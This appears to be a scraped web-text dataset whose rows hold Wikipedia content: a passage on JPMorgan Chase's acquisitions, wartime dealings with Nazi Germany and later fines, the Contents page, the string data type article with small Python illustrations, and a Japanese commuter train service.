Office of Thrift Supervision, in what was by far the largest bank failure in American history, seized Washington Mutual Bank and placed it into receivership. The FDIC sold the bank's assets, secured debt obligations and deposits to JPMorgan Chase Bank, NA for $1.888 billion, which re-opened the bank the following day. As a result of the takeover, Washington Mutual shareholders lost all their equity. 35 Through the acquisition, JPMorgan became owner of the former accounts of Providian Financial, a credit card issuer WaMu acquired in 2005. The company completed the rebranding of Washington Mutual branches to Chase in late 2009. In the first quarter of 2006, Chase purchased Collegiate Funding Services, a portfolio company of private equity firm Lightyear Capital, for $663 million. CFS was used as the foundation for the Chase Student Loans, previously known as Chase Education Finance. 
36 In April of that same year, Chase acquired the Bank of New York Co.'s retail and small business banking network. This gave Chase access to 338 additional branches and 700,000 new customers in New York, New Jersey, Connecticut, and Indiana. 37 In 2019, Chase began opening retail branches in Pittsburgh and other areas within Western Pennsylvania; this coincided with Bank of America starting a similar expansion within the area the previous year. 38 Even though Chase entered the market organically as opposed to a merger acquisition, they still had to receive approval from the Office of the Comptroller of the Currency to open branches due to Chase's size as a whole. 39 Before Chase and Bank of America expanded its retail presence into the market, Pittsburgh had been one of the largest U.S. cities without a retail presence from any of the "Big Four", with locally based PNC Financial Services (no. 6 nationally) having a commanding market share in the area. Chase had previously considered buying National City branches from PNC that were required for divesture following that bank's acquisition of National City in 2009, but were instead sold to First Niagara Bank (since absorbed into KeyBank); it had been speculated that PNC intentionally sold the branches to a much smaller competitor due to not wanting to compete with a "Big Four" bank in its home market. 40 In August 2021, Chase announced that it was the first bank to have a retail presence in all 48 of the contiguous United States. The last state in the US to have a Chase branch was Montana, with the branch in Billings the first branch in the state. 41 42 In September 2021, JPMorgan Chase entered the United Kingdom retail banking market by launching an app-based current account and Deposit account under the Chase brand. This is the company's first retail banking operation outside of the United States. 43 44 45 A press release from the National Archives and Records Administration (NARA) in 2004 announced that many of the new Federal Bureau of Investigation (FBI) files had become declassified. This declassification enabled the discovery that before and during the early years of World War II, the German government sold a special kind of Reichsmark, known as R ckwanderer returnee Marks, to American citizens of German descent. Chase National Bank, along with other businesses, were involved in these transactions. Through Chase, this allowed Nazi sympathizers to purchase Marks with dollars at a discounted rate. Specifically, "The financial houses understood that the German government paid the commissions (to its agents, including Chase) through the sale of discounted, blocked Marks that came mainly from Jews who had fled Germany. In other words, Nazi Germany was able to offer these Marks below face-value because they had been stolen from migr s fleeing the Nazi regime. Between 1936 and 1941, the Nazis amassed over $20 million, and the businesses enabling these transactions earned $1.2 million in commissions. Of these commissions, over $500,000 went to Chase National Bank and its subagents. These facts were discovered when the FBI began its investigation in October 1940. The purpose of the investigation was to follow German-Americans who had bought the Marks. However, Chase National Bank's executives were never federally prosecuted because Chase's lead attorney threatened to reveal FBI, Army, and Navy "sources and methods" in court. 
citation needed Publicly naming the sources and methods could have posed security risks and threatened future intelligence gathering. To avoid such revelations, the executives' violations of the Johnson Act, the Espionage Act, and the Foreign Agents Registration Act were never prosecuted. 46 47 48 Besides the controversial R ckwanderer Mark Scheme, NARA records also revealed another controversy during the occupation of France by the Nazis. From the late 1930s until June 14, 1941, when President Franklin D. Roosevelt (FDR) issued an Executive Order freezing German assets, Chase National Bank worked with the Nazi government. The order blocking any access to French accounts in the U.S. by anyone, but especially by the Nazis was issued by Secretary of the Treasury, Henry Morgenthau Jr., with the approval of FDR. Within hours of the order, Chase unblocked the accounts and the funds were transferred through South America to Nazi Germany. 48 U.S. Treasury officials wanted an investigation of French subsidiaries of American banks, including: Chase Bank, J.P. Morgan Co, National City Corporation, Guaranty Bank, Bankers Trust, and American Express. Of these banks, only Chase and Morgan remained open in France during the Nazi occupation. The Chase branch chief in Paris, France, Carlos Niedermann, told his supervisor in New York that there had been an "expansion of deposits". Also, Niedermann was, "very vigorous in enforcing restrictions against Jewish property, even going so far as to refuse to release funds belonging to Jews in anticipation that a decree with retroactive provisions prohibiting such release might be published in the near future by the occupying Nazi authorities" citation needed . In 1998, Chase general counsel William McDavid said that Chase did not have control over Niedermann. Whether that claim was true or not, Chase Manhattan Bank acknowledged seizing about 100 accounts during the Vichy regime. Kenneth McCallion, a partner in the New York firm Goodkind Labaton Rudoff Sucharow, 49 led a lawsuit against Barclays Bank for the illegal seizure of assets during World War Two and has since turned his attention toward Chase. The World Jewish Congress (WJC), entered into discussions with Chase and a spokesperson for the WJC said, "Nobody at Chase today is guilty. They were not involved in whatever happened, but they do accept that they have an institutional responsibility. A Chase spokesman said, "This is a moral issue that we take very seriously. Chase general counsel McDavid added, "that Chase intends to compensate Jewish account holders whose assets were illegally plundered". In 1999, the French government formed a commission to report findings to Prime Minister Lionel Jospin. Claire Andrieu, a commission member and history professor at the Sorbonne, said that under the Vichy regime, French banks received visits from Nazi officials but U.S. banks did not. At that time, they did not have to report Jewish accounts, but they did just as the French banks did. She goes on to say that an American ambassador protected the U.S. subsidiaries. 50 51 52 In May 1999, Chase Manhattan reached a settlement with 20 plaintiffs who filed an asset reparations lawsuit, such as the Claims Conference, a Jewish restitution organization, and the WJC. 53 The settlement subjected Chase to an independent probe of its conduct of activity which occurred from the company's offices in Paris and Ch teauneuf-sur-Cher, in southern France, during the World War II-era. 
53 The settlement also meant that the company would eventually have to pay modest, but symbolically important, payouts to former Chase customers after the probe was completed. 53 It was determined that Chase owed only a sum well under $1 million in asset reparations by this point in time. 53 The settlement made Chase Manhattan the first bank to reach a settlement over Holocaust-related claims. 53 In February 2000, more than fifty years after information regarding the ties between Chase and Nazi Germany was revealed during Congressional hearings, Chase Manhattan publicly acknowledged the deal its predecessor Chase National Bank had made with Nazi Germany, which helped the German government exchange Marks that likely originated from the forced sale of assets by Jewish refugees. 54 JPMorgan Chase paid $16 billion in fines, settlements, and other litigation expenses from 2011 to 2013. Of that $16 billion, about $8.5 billion was for fines and settlements resulting from illegal actions taken by bank executives, according to Richard Eskow at the Campaign for America's Future, who cited a report from Joshua Rosner of Graham Fisher & Co. The $16 billion total does not include a recent settlement that calls for JPMorgan Chase to pay $100 million to waive $417 million in claims it had made against clients of the firm MF Global. The U.S. Treasury's Office of Foreign Assets Control found that JPMorgan had illegally aided dictatorships in Cuba, Sudan, Liberia, and Iran, including transferring 32,000 ounces of gold bullion (valued at approximately $20,560,000) to the benefit of a bank in Iran. JPMorgan did not voluntarily self-disclose the Iranian matter to OFAC. 55 Among its other transgressions, JPMorgan has been found to have: 56 57 58 59 60 61 During 2013 and 2014, Chase and other banks received media attention for the practice of cancelling the personal and business accounts of hundreds of legal sex workers, citing in some instances the "morality clause" of their account agreements. 62 It was later discovered that this practice extended to mortgage accounts and business loans. 63 Chase canceled the mortgage refinancing process, which the bank itself had initiated, for one individual whose production company made softcore films like those broadcast on Cinemax. 64 This resulted in a lawsuit 65 which cited evasive dealings and misleading statements by several Chase executives, including Securities Vice President Adam Gelcich, Legal Fair Lending Department Vice President Deb Vincent, and an unnamed executive director and assistant general counsel. 66 In addition to closing accounts for sex workers, the bank has also been using its "morality clause" to disassociate from other types of businesses. 67 Some of these other businesses include medical marijuana dispensaries and any that are "gun related". 67 Another was a woman-owned condom manufacturing company called Lovability Condoms. Company founder Tiffany Gaines was rejected by Chase Paymentech services "as processing sales for adult-oriented products is a prohibited vertical" and was told that it was a "reputational risk" to process payment for condoms. 67 Gaines then started a petition asking Chase to review and change its policy of classifying condoms as an "adult oriented product". The bank later reversed its decision and invited Gaines to submit an application, noting that it was already doing business with a "wide variety of merchants, including grocers and drug stores, that sell similar products". 
68 In 2019, the bank faced growing criticism for its alleged practice of arbitrarily targeting the personal accounts of outspoken online personalities such as Martina Markota and Proud Boys chairman Enrique Tarrio. Although the specific motives behind the closures were not officially disclosed, the assumption among many on the right was that they were political in nature. 69 Financial documents 70 from Energy Transfer Partners, the pipeline builder for the Dakota Access Pipeline, list a number of large banking institutions that have provided credit for the project, including JP Morgan Chase. Because of these financial ties, Chase and other banks were a target 71 of the Dakota Access Pipeline protests during 2016 and 2017. JPMorgan Chase agreed to pay $5 million to compensate its male employees who did not receive the same paid parental leave as women from 2011 to 2017. 72 In December 2017, the bank "clarified its policy to ensure equal access to men and women looking to be their new child's main caregiver". 73 According to the attorneys involved, this is the biggest recorded settlement in a U.S. parental leave discrimination case. JPMorgan agreed to training and monitoring to ensure equal parental leave benefits and stated that "its policy was always intended to be gender-neutral". 74 Chase has faced criticism and protests over its high rate of investment in various fossil fuel industries such as coal, oil, and gas. 75 A study released in October 2019 indicated that Chase invests more ($75 billion) in fossil fuels than any other bank. 76 An analysis of home purchases in Chicago from 2012 to 2018 by City Bureau and WBEZ Chicago showed that JP Morgan Chase "loaned 41 times more in Chicago’s white neighborhoods than it did in the city’s black neighborhoods". 77 The report prompted protests at Chicago Chase branches in June 2020. 78 At a reopening of a remodeled Chase branch in Chicago's South Shore, Dimon said via video, "we have targets now to do $600 million (over the next five years) in new mortgages for Blacks and new homeowners in Chicago neighborhoods". 79 The U.S. government sued JP Morgan Chase Bank in 2022, alleging that JP Morgan "facilitated, sustained, and concealed the human trafficking network operated by Jeffrey Epstein". 80 |
152 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Wikipedia:Contents | Explore the vast knowledge of Wikipedia through these helpful resources. If you have a specific topic in mind, use Wikipedia's search box. If you don't know exactly what you are looking for or wish to explore broad areas, click on a link in the header menu at the top of this page, or begin your browsing below: Wikipedia organizes its content into distinct subject classifications, each with further subdivisions. Explore the diverse cultures, arts, beliefs, and customs of human societies. Discover the wonders of Earth's lands, features, inhabitants, and planetary phenomena. Learn about physical, mental, and social health. Dive into the past through written records and scholarly exploration. Explore chronological events through our comprehensive timelines. Stay up-to-date with encyclopedia entries covering ongoing events. Delve into diverse human actions, from leisure and entertainment to industry and warfare. Explore the study of quantity, structure, space, and change. Understand natural phenomena through empirical evidence, observations, and experiments. Learn about collective entities, ethnic groups, and nations. Dive deep into fundamental questions about existence, knowledge, values, and more. Access comprehensive information collections compiled for easy retrieval. Refer to various third-party classification systems linked to Wikipedia articles. Access sources on specific topics for further reading or verification. Explore social-cultural systems, beliefs, ethics, and more. Understand collectives, social interactions, political authority, and cultural norms. Learn about techniques, skills, methods, and processes in technology and science. Get summaries of broad topics with links to subtopics, biographies, and related articles. Explore topics in outline format, linking to more detailed articles. Find enumerations of specific types, such as lists of countries and people. Access featured articles, images, news, and more through thematic portals. Access lists of terms with definitions through alphabetical glossaries. Browse Wikipedia's category pages, which index articles by subject. Explore subjects that demand high-quality articles, grouped by importance. Discover Wikipedia's best, reviewed and vetted for quality. Explore well-written, factually accurate articles that meet editorial standards. Listen to Wikipedia articles as spoken word recordings. Browse Wikipedia's articles alphabetically. Topics Types Places, people and times Indices |
153 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/String_(computer_science) | In computer programming, a string is traditionally a sequence of characters, either as a literal constant or as some kind of variable. The latter may allow its elements to be mutated and the length changed, or it may be fixed (after creation). A string is generally considered as a data type and is often implemented as an array data structure of bytes (or words) that stores a sequence of elements, typically characters, using some character encoding. String may also denote more general arrays or other sequence (or list) data types and structures. Depending on the programming language and precise data type used, a variable declared to be a string may either cause storage in memory to be statically allocated for a predetermined maximum length or employ dynamic allocation to allow it to hold a variable number of elements. When a string appears literally in source code, it is known as a string literal or an anonymous string. 1 In formal languages, which are used in mathematical logic and theoretical computer science, a string is a finite sequence of symbols that are chosen from a set called an alphabet. A primary purpose of strings is to store human-readable text, like words and sentences. Strings are used to communicate information from a computer program to the user of the program. 2 A program may also accept string input from its user. Further, strings may store data expressed as characters yet not intended for human reading. Example strings and their purposes: The term string may also designate a sequence of data or computer records other than characters — like a "string of bits" — but when used without qualification it refers to strings of characters. 4 Use of the word "string" to mean any items arranged in a line, series or succession dates back centuries. 5 6 In 19th-Century typesetting, compositors used the term "string" to denote a length of type printed on paper; the string would be measured to determine the compositor's pay. 7 4 8 Use of the word "string" to mean "a sequence of symbols or linguistic elements in a definite order" emerged from mathematics, symbolic logic, and linguistic theory to speak about the formal behavior of symbolic systems, setting aside the symbols' meaning. 4 For example, logician C. I. Lewis wrote in 1918: 9 A mathematical system is any set of strings of recognisable marks in which some of the strings are taken initially and the remainder derived from these by operations performed according to rules which are independent of any meaning assigned to the marks. That a system should consist of 'marks' instead of sounds or odours is immaterial. According to Jean E. Sammet, "the first realistic string handling and pattern matching language" for computers was COMIT in the 1950s, followed by the SNOBOL language of the early 1960s. 10 A string datatype is a datatype modeled on the idea of a formal string. Strings are such an important and useful datatype that they are implemented in nearly every programming language. In some languages they are available as primitive types and in others as composite types. The syntax of most high-level programming languages allows for a string, usually quoted in some way, to represent an instance of a string datatype; such a meta-string is called a literal or string literal. Although formal strings can have an arbitrary finite length, the length of strings in real languages is often constrained to an artificial maximum. 
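The distinction drawn above between a string as a sequence of characters and its concrete storage as encoded bytes can be seen directly in Python, the language used elsewhere in this notebook. A small illustration using only built-in types; the example words are arbitrary:

# A string literal creates a str object: an immutable sequence of characters.
greeting = "hello, world"

# The same text stored as bytes depends on the chosen character encoding.
utf8_bytes = greeting.encode("utf-8")
print(type(greeting), len(greeting))      # <class 'str'> 12 characters
print(type(utf8_bytes), len(utf8_bytes))  # <class 'bytes'> 12 bytes (pure ASCII text)

# For non-ASCII text the character count and the byte count diverge.
word = "café"
print(len(word), len(word.encode("utf-8")))   # 4 characters, 5 bytes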
In general, there are two types of string datatypes: fixed-length strings, which have a fixed maximum length to be determined at compile time and which use the same amount of memory whether this maximum is needed or not, and variable-length strings, whose length is not arbitrarily fixed and which can use varying amounts of memory depending on the actual requirements at run time (see Memory management). Most strings in modern programming languages are variable-length strings. Of course, even variable-length strings are limited in length by the size of available computer memory. The string length can be stored as a separate integer (which may put another artificial limit on the length) or implicitly through a termination character, usually a character value with all bits zero such as in C programming language. See also "Null-terminated" below. String datatypes have historically allocated one byte per character, and, although the exact character set varied by region, character encodings were similar enough that programmers could often get away with ignoring this, since characters a program treated specially (such as period and space and comma) were in the same place in all the encodings a program would encounter. These character sets were typically based on ASCII or EBCDIC. If text in one encoding was displayed on a system using a different encoding, text was often mangled, though often somewhat readable and some computer users learned to read the mangled text. Logographic languages such as Chinese, Japanese, and Korean (known collectively as CJK) need far more than 256 characters (the limit of a one 8 bit byte per-character encoding) for reasonable representation. The normal solutions involved keeping single-byte representations for ASCII and using two-byte representations for CJK ideographs. Use of these with existing code led to problems with matching and cutting of strings, the severity of which depended on how the character encoding was designed. Some encodings such as the EUC family guarantee that a byte value in the ASCII range will represent only that ASCII character, making the encoding safe for systems that use those characters as field separators. Other encodings such as ISO 2022 and Shift-JIS do not make such guarantees, making matching on byte codes unsafe. These encodings also were not "self-synchronizing", so that locating character boundaries required backing up to the start of a string, and pasting two strings together could result in corruption of the second string. Unicode has simplified the picture somewhat. Most programming languages now have a datatype for Unicode strings. Unicode's preferred byte stream format UTF 8 is designed not to have the problems described above for older multibyte encodings. UTF 8, UTF 16 and UTF 32 require the programmer to know that the fixed-size code units are different from the "characters", the main difficulty currently is incorrectly designed APIs that attempt to hide this difference (UTF 32 does make code points fixed-sized, but these are not "characters" due to composing codes). Some languages, such as C , Perl and Ruby, normally allow the contents of a string to be changed after it has been created; these are termed mutable strings. In other languages, such as Java, JavaScript, Lua, Python, and Go, the value is fixed and a new string must be created if any alteration is to be made; these are termed immutable strings. 
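Python itself falls in the immutable-string camp described here, with bytearray as a mutable counterpart. A short illustration (standard library only):

s = "immutable"
try:
    s[0] = "I"              # strings cannot be modified in place
except TypeError as err:
    print("str is immutable:", err)

# "Changing" a string really builds a new object.
t = "I" + s[1:]
print(t, t is s)            # Immutable False

# bytearray is a mutable sequence of bytes, closer to a mutable string type.
buf = bytearray(b"immutable")
buf[0] = ord("I")           # in-place modification is allowed here
print(buf.decode("ascii"))  # Immutable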
Some of these languages with immutable strings also provide another type that is mutable, such as Java and .NET's StringBuilder, the thread-safe Java StringBuffer, and the Cocoa NSMutableString. There are both advantages and disadvantages to immutability: although immutable strings may require inefficiently creating many copies, they are simpler and completely thread-safe. Strings are typically implemented as arrays of bytes, characters, or code units, in order to allow fast access to individual units or substrings—including characters when they have a fixed length. A few languages such as Haskell implement them as linked lists instead. Some languages, such as Prolog and Erlang, avoid implementing a dedicated string datatype at all, instead adopting the convention of representing strings as lists of character codes. Representations of strings depend heavily on the choice of character repertoire and the method of character encoding. Older string implementations were designed to work with repertoire and encoding defined by ASCII, or more recent extensions like the ISO 8859 series. Modern implementations often use the extensive repertoire defined by Unicode along with a variety of complex encodings such as UTF 8 and UTF 16. The term byte string usually indicates a general-purpose string of bytes, rather than strings of only (readable) characters, strings of bits, or such. Byte strings often imply that bytes can take any value and any data can be stored as-is, meaning that there should be no value interpreted as a termination value. Most string implementations are very similar to variable-length arrays with the entries storing the character codes of corresponding characters. The principal difference is that, with certain encodings, a single logical character may take up more than one entry in the array. This happens for example with UTF 8, where single codes (UCS code points) can take anywhere from one to four bytes, and single characters can take an arbitrary number of codes. In these cases, the logical length of the string (number of characters) differs from the physical length of the array (number of bytes in use). UTF 32 avoids the first part of the problem. The length of a string can be stored implicitly by using a special terminating character; often this is the null character (NUL), which has all bits zero, a convention used and perpetuated by the popular C programming language. 11 Hence, this representation is commonly referred to as a C string. This representation of an n-character string takes n 1 space (1 for the terminator), and is thus an implicit data structure. In terminated strings, the terminating code is not an allowable character in any string. Strings with length field do not have this limitation and can also store arbitrary binary data. An example of a null-terminated string stored in a 10 byte buffer, along with its ASCII (or more modern UTF 8) representation as 8 bit hexadecimal numbers is: The length of the string in the above example, "FRANK", is 5 characters, but it occupies 6 bytes. Characters after the terminator do not form part of the representation; they may be either part of other data or just garbage. (Strings of this form are sometimes called ASCIZ strings, after the original assembly language directive used to declare them.) Using a special byte other than null for terminating strings has historically appeared in both hardware and software, though sometimes with a value that was also a printing character. 
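The null-terminated layout and the character-count-versus-byte-count distinction described above can be mimicked in Python. This is only a sketch of the byte layout, not how Python stores its own str objects; the ten-byte buffer and the word FRANK follow the example in the text.

# Place "FRANK" in a 10-byte buffer terminated by a NUL (0x00) byte.
c_buf = bytearray(10)                  # ten bytes, all initially 0x00
c_buf[:5] = b"FRANK"
print(c_buf.hex(" "))                  # 46 52 41 4e 4b 00 00 00 00 00

# Reading back stops at the first NUL, as C's string functions would.
text = bytes(c_buf).split(b"\x00", 1)[0].decode("ascii")
print(text, len(text))                 # FRANK 5  (5 characters, 6 bytes used with the terminator)

# Logical length (characters) versus physical length (bytes) under UTF-8.
word = "café"
print(len(word), len(word.encode("utf-8")))   # 4 characters, 5 bytes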
The dollar sign $ was used by many assembler systems, the colon : by CDC systems (this character had a value of zero), and the ZX80 used the quotation mark " 12 since this was the string delimiter in its BASIC language. Somewhat similar, "data processing" machines like the IBM 1401 used a special word mark bit to delimit strings at the left, where the operation would start at the right. This bit had to be clear in all other parts of the string. This meant that, while the IBM 1401 had a seven-bit word, almost no-one ever thought to use this as a feature, and override the assignment of the seventh bit to (for example) handle ASCII codes. Early microcomputer software relied upon the fact that ASCII codes do not use the high-order bit, and set it to indicate the end of a string. It must be reset to 0 prior to output. 13 The length of a string can also be stored explicitly, for example by prefixing the string with the length as a byte value. This convention is used in many Pascal dialects; as a consequence, some people call such a string a Pascal string or P-string. Storing the string length as a byte limits the maximum string length to 255. To avoid such limitations, improved implementations of P-strings use 16-, 32-, or 64-bit words to store the string length. When the length field covers the address space, strings are limited only by the available memory. If the length is bounded, then it can be encoded in constant space, typically a machine word, thus leading to an implicit data structure, taking n/k space, where k is the number of characters in a word (8 for 8-bit ASCII on a 64-bit machine, 1 for 32-bit UTF-32/UCS-4 on a 32-bit machine, etc.). If the length is not bounded, encoding a length n takes log(n) space (see fixed-length code), so length-prefixed strings are a succinct data structure, encoding a string of length n in log(n) + n space. In the latter case, the length-prefix field itself does not have fixed length, therefore the actual string data needs to be moved when the string grows such that the length field needs to be increased. Here is a Pascal string stored in a 10-byte buffer, along with its ASCII/UTF-8 representation: Many languages, including object-oriented ones, implement strings as records with an internal structure like: However, since the implementation is usually hidden, the string must be accessed and modified through member functions. text is a pointer to a dynamically allocated memory area, which might be expanded as needed. See also string (C++). Both character termination and length codes limit strings: for example, C character arrays that contain null (NUL) characters cannot be handled directly by C string library functions, while strings using a length code are limited to the maximum value of the length code. Both of these limitations can be overcome by clever programming. It is possible to create data structures, and functions that manipulate them, that do not have the problems associated with character termination and can in principle overcome length code bounds. It is also possible to optimize the string representation using techniques from run-length encoding (replacing repeated characters by the character value and a length) and Hamming encoding. While these representations are common, others are possible. Using ropes makes certain string operations, such as insertions, deletions, and concatenations, more efficient. The core data structure in a text editor is the one that manages the string (sequence of characters) that represents the current state of the file being edited. 
While that state could be stored in a single long consecutive array of characters, a typical text editor instead uses an alternative representation as its sequence data structure—a gap buffer, a linked list of lines, a piece table, or a rope—which makes certain string operations, such as insertions, deletions, and undoing previous edits, more efficient. 14 The differing memory layout and storage requirements of strings can affect the security of the program accessing the string data. String representations requiring a terminating character are commonly susceptible to buffer overflow problems if the terminating character is not present, caused by a coding error or an attacker deliberately altering the data. String representations adopting a separate length field are also susceptible if the length can be manipulated. In such cases, program code accessing the string data requires bounds checking to ensure that it does not inadvertently access or change data outside of the string memory limits. String data is frequently obtained from user input to a program. As such, it is the responsibility of the program to validate the string to ensure that it represents the expected format. Performing limited or no validation of user input can cause a program to be vulnerable to code injection attacks. Sometimes, strings need to be embedded inside a text file that is both human-readable and intended for consumption by a machine. This is needed in, for example, source code of programming languages, or in configuration files. In this case, the NUL character does not work well as a terminator since it is normally invisible (non-printable) and is difficult to input via a keyboard. Storing the string length would also be inconvenient as manual computation and tracking of the length is tedious and error-prone. Two common representations are: While character strings are very common uses of strings, a string in computer science may refer generically to any sequence of homogeneously typed data. A bit string or byte string, for example, may be used to represent non-textual binary data retrieved from a communications medium. This data may or may not be represented by a string-specific datatype, depending on the needs of the application, the desire of the programmer, and the capabilities of the programming language being used. If the programming language's string implementation is not 8 bit clean, data corruption may ensue. C programmers draw a sharp distinction between a "string", aka a "string of characters", which by definition is always null terminated, vs. a "byte string" or "pseudo string" which may be stored in the same array but is often not null terminated. Using C string handling functions on such a "byte string" often seems to work, but later leads to security problems. 15 16 17 There are many algorithms for processing strings, each with various trade-offs. Competing algorithms can be analyzed with respect to run time, storage requirements, and so forth. The name stringology was coined in 1984 by computer scientist Zvi Galil for the theory of algorithms and data structures used for string processing. 18 19 20 Some categories of algorithms include: Advanced string algorithms often employ complex mechanisms and data structures, among them suffix trees and finite-state machines. Character strings are such a useful datatype that several languages have been designed in order to make string processing applications easy to write. 
Examples include the following languages: Many Unix utilities perform simple string manipulations and can be used to easily program some powerful string processing algorithms. Files and finite streams may be viewed as strings. Some APIs like Multimedia Control Interface, embedded SQL or printf use strings to hold commands that will be interpreted. Many scripting programming languages, including Perl, Python, Ruby, and Tcl, employ regular expressions to facilitate text operations. Perl is particularly noted for its regular expression use, 21 and many other languages and applications implement Perl-compatible regular expressions. Some languages such as Perl and Ruby support string interpolation, which permits arbitrary expressions to be evaluated and included in string literals. String functions are used to create strings or change the contents of a mutable string. They are also used to query information about a string. The set of functions and their names varies depending on the computer programming language. The most basic example of a string function is the string length function, which returns the length of a string (not counting any terminator characters or any of the string's internal structural information) and does not modify the string. This function is often named length or len. For example, length("hello world") would return 11. Another common function is concatenation, where a new string is created by appending two strings; this is often the addition operator. Some microprocessors' instruction set architectures contain direct support for string operations, such as block copy (e.g., REPNZ MOVSB in Intel x86). 22 Let Σ be a finite set of distinct, unambiguous symbols (alternatively called characters), called the alphabet. A string (or word 23 or expression 24 ) over Σ is any finite sequence of symbols from Σ. 25 For example, if Σ = {0, 1}, then 01011 is a string over Σ. The length of a string s is the number of symbols in s (the length of the sequence) and can be any non-negative integer; it is often denoted as |s|. The empty string is the unique string over Σ of length 0, and is denoted ε or λ. 25 26 The set of all strings over Σ of length n is denoted Σ^n. For example, if Σ = {0, 1}, then Σ^2 = {00, 01, 10, 11}. We have Σ^0 = {ε} for every alphabet Σ. The set of all strings over Σ of any length is the Kleene closure of Σ and is denoted Σ*. In terms of Σ^n, Σ* is the union of the sets Σ^n over all n ≥ 0. For example, if Σ = {0, 1}, then Σ* = {ε, 0, 1, 00, 01, 10, 11, 000, 001, 010, 011, ...}. Although the set Σ* itself is countably infinite, each element of Σ* is a string of finite length. A set of strings over Σ (i.e. any subset of Σ*) is called a formal language over Σ. For example, if Σ = {0, 1}, the set of strings with an even number of zeros, {ε, 1, 00, 11, 001, 010, 100, 111, 0000, 0011, 0101, 0110, 1001, 1010, 1100, 1111, ...}, is a formal language over Σ. Concatenation is an important binary operation on Σ*. For any two strings s and t in Σ*, their concatenation is defined as the sequence of symbols in s followed by the sequence of characters in t, and is denoted st. For example, if Σ = {a, b, ..., z}, s = bear, and t = hug, then st = bearhug and ts = hugbear. String concatenation is an associative, but non-commutative operation. The empty string ε serves as the identity element; for any string s, εs = sε = s. Therefore, the set Σ* and the concatenation operation form a monoid, the free monoid generated by Σ. 
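These basic string functions, and the Σ^n notation just introduced, are easy to demonstrate in Python; the small helper below is written for this notebook as an illustration only.

from itertools import product

print(len("hello world"))                                # 11, as in the length() example above
print("bear" + "hug", "hug" + "bear")                    # bearhug hugbear (not commutative)
print(len("bear" + "hug") == len("bear") + len("hug"))   # True: length respects concatenation

alphabet = ["0", "1"]

def strings_of_length(n):
    # Enumerate the set written above as Sigma^n.
    return ["".join(p) for p in product(alphabet, repeat=n)]

print(strings_of_length(2))   # ['00', '01', '10', '11']
print(strings_of_length(0))   # ['']  (the empty string is the only string of length 0)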
In addition, the length function defines a monoid homomorphism from Σ* to the non-negative integers (that is, a function L: Σ* → ℕ ∪ {0} such that L(st) = L(s) + L(t) for all s, t in Σ*). A string s is said to be a substring or factor of t if there exist (possibly empty) strings u and v such that t = usv. The relation "is a substring of" defines a partial order on Σ*, the least element of which is the empty string. A string s is said to be a prefix of t if there exists a string u such that t = su. If u is nonempty, s is said to be a proper prefix of t. Symmetrically, a string s is said to be a suffix of t if there exists a string u such that t = us. If u is nonempty, s is said to be a proper suffix of t. Suffixes and prefixes are substrings of t. Both the relations "is a prefix of" and "is a suffix of" are prefix orders. The reverse of a string is a string with the same symbols but in reverse order. For example, if s = abc (where a, b, and c are symbols of the alphabet), then the reverse of s is cba. A string that is the reverse of itself (e.g., s = madam) is called a palindrome, which also includes the empty string and all strings of length 1. A string s = uv is said to be a rotation of t if t = vu. For example, if Σ = {0, 1}, the string 0011001 is a rotation of 0100110, where u = 00110 and v = 01. As another example, the string abc has three different rotations, viz. abc itself (with u = abc, v = ε), bca (with u = bc, v = a), and cab (with u = c, v = ab). It is often useful to define an ordering on a set of strings. If the alphabet Σ has a total order (cf. alphabetical order), one can define a total order on Σ* called lexicographical order. The lexicographical order is total if the alphabetical order is, but is not well-founded for any nontrivial alphabet, even if the alphabetical order is. For example, if Σ = {0, 1} and 0 < 1, then the lexicographical order on Σ* includes the relationships 0 < 00 < 000 < ... < 0001 < ... < 001 < ... < 01 < 010 < ... < 011 < 0110 < ... < 01111 < ... < 1 < 10 < 100 < ... < 101 < ... < 111 < ... < 1111 < ... < 11111 < ... With respect to this ordering, e.g. the infinite set {1, 01, 001, 0001, 00001, 000001, ...} has no minimal element. See Shortlex for an alternative string ordering that preserves well-foundedness. For the example alphabet, the shortlex order is 0 < 1 < 00 < 01 < 10 < 11 < 000 < 001 < 010 < 011 < 100 < 101 < 110 < 111 < 0000 < 0001 < 0010 < 0011 < ... < 1111 < 00000 < 00001 < ... A number of additional operations on strings commonly occur in the formal theory. These are given in the article on string operations. Strings admit the following interpretation as nodes on a graph, where k is the number of symbols in Σ: The natural topology on the set of fixed-length strings or variable-length strings is the discrete topology, but the natural topology on the set of infinite strings is the limit topology, viewing the set of infinite strings as the inverse limit of the sets of finite strings. This is the construction used for the p-adic numbers and some constructions of the Cantor set, and yields the same topology. Isomorphisms between string representations of topologies can be found by normalizing according to the lexicographically minimal string rotation. |
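Several of the formal notions above (reversal, palindromes, rotations, and the shortlex order) translate into a few lines of Python. These helper functions are sketches written for this notebook, not part of any standard library:

def reverse(s: str) -> str:
    return s[::-1]

def is_palindrome(s: str) -> bool:
    return s == s[::-1]

def is_rotation(s: str, t: str) -> bool:
    # s is a rotation of t exactly when they have equal length and s occurs in t+t.
    return len(s) == len(t) and s in t + t

def shortlex_sorted(strings):
    # Order first by length, then lexicographically (the shortlex order).
    return sorted(strings, key=lambda w: (len(w), w))

print(reverse("abc"))                                  # cba
print(is_palindrome("madam"), is_palindrome(""))       # True True
print(is_rotation("0011001", "0100110"))               # True, the example from the text
print(shortlex_sorted(["1", "01", "001", "0", "00"]))  # ['0', '1', '00', '01', '001']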
154 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Special:Random | The Rakuraku Biwako is a commuter limited express train service operated by West Japan Railway Company (JR West) between Osaka and Maibara or Kusatsu in Japan since June 2003. It replaced the previous Biwako Liner services. 1 As of March 2024, one weekday morning service (Rakuraku Biwako 1) runs from Maibara to Osaka, and two weekday evening services (Rakuraku Biwako 2 and 4) run from Osaka to Maibara and Kusatsu respectively, with the journey time from Osaka to Maibara taking approximately 1 hour 28 minutes. 2 Services were initially operated using the nine-car 681 series or 683 series EMUs used on Thunderbird services. 1 Rakuraku Biwako 1 and 2 (between Osaka and Maibara) are formed as follows, with car 1 at the Maibara end. 3 Rakuraku Biwako 4 (Osaka to Kusatsu) is formed as follows, with car 1 at the Osaka end. 4 The Biwako Express service was introduced from 2 June 2003. 5 The service was made entirely no-smoking from 1 June 2009. 6 The service started calling at Minami-Kusatsu Station, 7 and all seats became reserved 8 from 13 March 2021. Effective the 16 March 2024 timetable revision, all services were renamed to Rakuraku Biwako. At the same time, the nine-car 683 series sets operated on this service were replaced with six-car 681 or 683 series sets. 9 |
